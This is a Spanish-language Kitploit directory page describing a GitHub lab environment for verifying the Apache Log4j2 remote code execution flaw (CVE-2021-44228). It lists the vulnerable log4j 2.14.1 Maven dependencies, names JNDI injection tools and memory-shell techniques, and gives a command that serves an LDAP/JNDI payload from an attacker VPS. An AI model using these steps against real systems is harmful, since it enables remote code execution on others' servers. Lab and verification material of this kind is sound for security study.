Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Apache-Log4j2-RCE — Apache Log4j2 RCE (CVE-2021-44228) entorno de verificación | Kitploit
Herramientas/GitHubGitHub/1in9e/apache-log4j2-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

Apache Log4j2 RCE (CVE-2021-44228) entorno de verificación

Ver Repositorio
211hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Entorno de verificación de RCE de Apache Log4j2

Desde el 2021.12.09

Algunas referencias

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

Configuración del entorno

Introducción de paquetes Maven y rangos de versiones vulnerables

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

Verificación

Usar dnslog para detectar si se está utilizando

0

Combinar ldap con jndi para explotar RCE

Relacionado con la versión de JDK, después de JDK 11.0.1, 8u191, 7u201, 6u211 es necesario configurar manualmente trustURLCodebase como true.

Para más detalles, consulte https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

Formas de explotación, se pueden combinar con herramientas de inyección JNDI, como JNDI-Injection-Exploit , fastjson_rce_tool , JNDIExploit

También se pueden combinar herramientas para implementar varios métodos de retroalimentación (echo) ya conocidos e inyección de caballos de memoria (memory shell).

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

Web

PENDIENTE

3

Acerca de

https://github.com/apache/logging-log4j2/tags

Descargar herramienta